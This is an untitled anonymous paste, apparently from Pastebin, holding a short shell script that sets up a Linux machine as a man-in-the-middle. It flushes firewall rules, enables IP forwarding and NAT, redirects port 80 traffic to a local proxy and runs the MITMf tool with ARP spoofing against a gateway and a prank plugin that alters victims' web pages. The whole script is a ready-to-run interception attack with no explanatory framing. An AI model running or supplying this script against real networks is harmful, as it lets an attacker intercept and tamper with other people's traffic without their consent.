Advertisement
Guest User

Untitled

a guest
May 20th, 2019
126
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.55 KB | None | 0 0
  1. gw_if="eth0"
  2. client_if="eth1"
  3. gw_ip="172.25.10.1"
  4. client_iprange ="10.10.99.1/24"
  5.  
  6.  
  7. sudo ifconfig $client_if $client_iprange
  8.  
  9. sudo iptables -F INPUT
  10. sudo iptables -F OUTPUT
  11. sudo iptables -F FORWARD
  12. sudo iptables -F -t nat
  13.  
  14. sudo echo 1 > /proc/sys/net/ipv4/ip_forward
  15. sudo iptables -t nat -A POSTROUTING -o $gw_if -j MASQUERADE
  16. sudo iptables -t nat -A PREROUTING -i $client_if -p tcp --dport 80 -j REDIRECT --to-port 8080
  17.  
  18. cd ~/MITMf
  19. sudo python2 mitmf.py -i $client_if --gateway $gw_ip -l 8080 --spoof --arp --upsidedowntern$
  20.  
  21. echo 0 > /proc/sys/net/ipv4/ip_forward
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement